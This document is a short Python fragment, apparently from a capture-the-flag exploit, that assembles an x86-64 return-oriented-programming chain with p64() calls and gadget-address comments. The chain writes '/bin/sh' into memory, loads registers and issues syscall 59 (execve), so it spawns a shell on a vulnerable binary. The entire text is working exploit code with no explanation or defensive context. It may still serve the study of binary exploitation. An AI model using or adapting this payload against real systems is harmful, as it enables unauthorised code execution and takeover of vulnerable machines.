payload = p64(0x40f651)
#0x000000000040f651: pop rsi; ret; 
payload += p64(0x445070)+p64(0x426431)
# 0x0000000000426431: xchg eax, esi; ret; 
payload += p64(0x40f651)
# 0x000000000040f651: pop rsi; ret; 
payload += p64(0x68662f6e69622f)+p64(0x4126b2)
# 0x00000000004126b2: mov qword ptr [rax], rsi; ret; 
payload += p64(0x40f651)
# 0x000000000040f651: pop rsi; ret; 
payload += p64(0x40d7fb)+p64(0x426431)
# 0x0000000000426431: xchg eax, esi; ret; 
payload += p64(0x40d44d)
# 0x000000000040d44d: pop rdi; jmp rax; 
payload += p64(0x445070)
# 0x000000000040d7fb: pop r12; ret; 
payload += p64(0x0)+p64(0x40f651)
# 0x000000000040f651: pop rsi; ret; 
payload += p64(0x40d857)+p64(0x426431)
# 0x0000000000426431: xchg eax, esi; ret; 
payload += p64(0x4320e8)
# 0x00000000004320e8: mov rdx, r12; mov rsi, r13; call rax; 
payload += b''
# 0x40d857: pop rbx ; pop rbp ; ret
payload += p64(0x0)+p64(0x40f651)
# 0x000000000040f651: pop rsi; ret; 
payload += p64(0x3b)+p64(0x426431)
# 0x0000000000426431: xchg eax, esi; ret; 
payload += p64(0x40f651)
# 0x000000000040f651: pop rsi; ret; 
payload += p64(0x0)+p64(0x42631e)
# 0x000000000042631e: syscall; 
payload += b''
